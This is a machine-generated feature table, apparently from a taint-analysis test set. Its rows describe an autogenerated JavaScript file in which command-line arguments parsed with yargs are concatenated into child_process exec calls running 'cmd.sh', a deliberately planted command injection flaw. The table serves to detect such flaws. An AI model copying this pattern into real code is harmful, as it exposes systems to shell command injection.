autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:22:55:25 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:22:55:25 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:55:22:55:25 | args | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:13 | tainted1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:13 | tainted1 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:13 | tainted1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:13 | tainted1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:13 | tainted1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted1 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted1 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted1 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted1 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted1 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted ... ').argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted ... ').argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted ... ').argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted ... ').argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:6:57:37 | tainted ... ').argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:23 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:23 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:23 | require | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:23 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:23 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | exceptional return of require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | exceptional return of require('yargs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | exceptional return of require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | exceptional return of require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | exceptional return of require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:32 | require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:17:57:37 | require ... ').argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:25:57:31 | 'yargs' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:34:57:37 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:34:57:37 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:34:57:37 | argv | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:34:57:37 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:57:34:57:37 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:13 | tainted2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:13 | tainted2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:13 | tainted2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:13 | tainted2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:13 | tainted2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted2 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted2 | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted ... parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted ... parse() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted ... parse() | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted ... parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:6:58:40 | tainted ... parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:23 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:23 | require | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:23 | require | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:23 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:23 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | exceptional return of require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | exceptional return of require('yargs') | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | exceptional return of require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | exceptional return of require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | exceptional return of require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:32 | require('yargs') | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:38 | require ... ).parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:38 | require ... ).parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:38 | require ... ).parse | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:38 | require ... ).parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:38 | require ... ).parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | exceptional return of require ... parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | exceptional return of require ... parse() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | exceptional return of require ... parse() | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | exceptional return of require ... parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | exceptional return of require ... parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:17:58:40 | require ... parse() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:25:58:31 | 'yargs' | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:34:58:38 | parse | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:34:58:38 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:34:58:38 | parse | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:34:58:38 | parse | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:58:34:58:38 | parse | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:60:56 | {taint1 ... 2rest}} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:60:56 | {taint1 ... 2rest}} | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:60:56 | {taint1 ... 2rest}} | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:60:56 | {taint1 ... 2rest}} | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:60:56 | {taint1 ... 2rest}} | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint1rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint1rest | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint1rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint1rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint1rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint2rest | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint2rest | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint2rest | enclosingFunctionBody | argv args require yargs usage Usage: foo bar command cp exec cmd.sh args tainted1 require yargs argv tainted2 require yargs parse taint1 taint1rest taint2 taint2rest taint1 tainted1 taint2 tainted2 cp exec cmd.sh taint1rest cp exec cmd.sh taint2rest taint3 require yargs argv cp exec cmd.sh taint3 taint4 require yargs argv cp exec cmd.sh taint4 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint2rest | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | taint2rest | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | {taint1 ... ted2\\n\\t} | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:60:8:63:2 | {taint1 ... ted2\\n\\t} | contextSurroundingFunctionParameters | () | +| 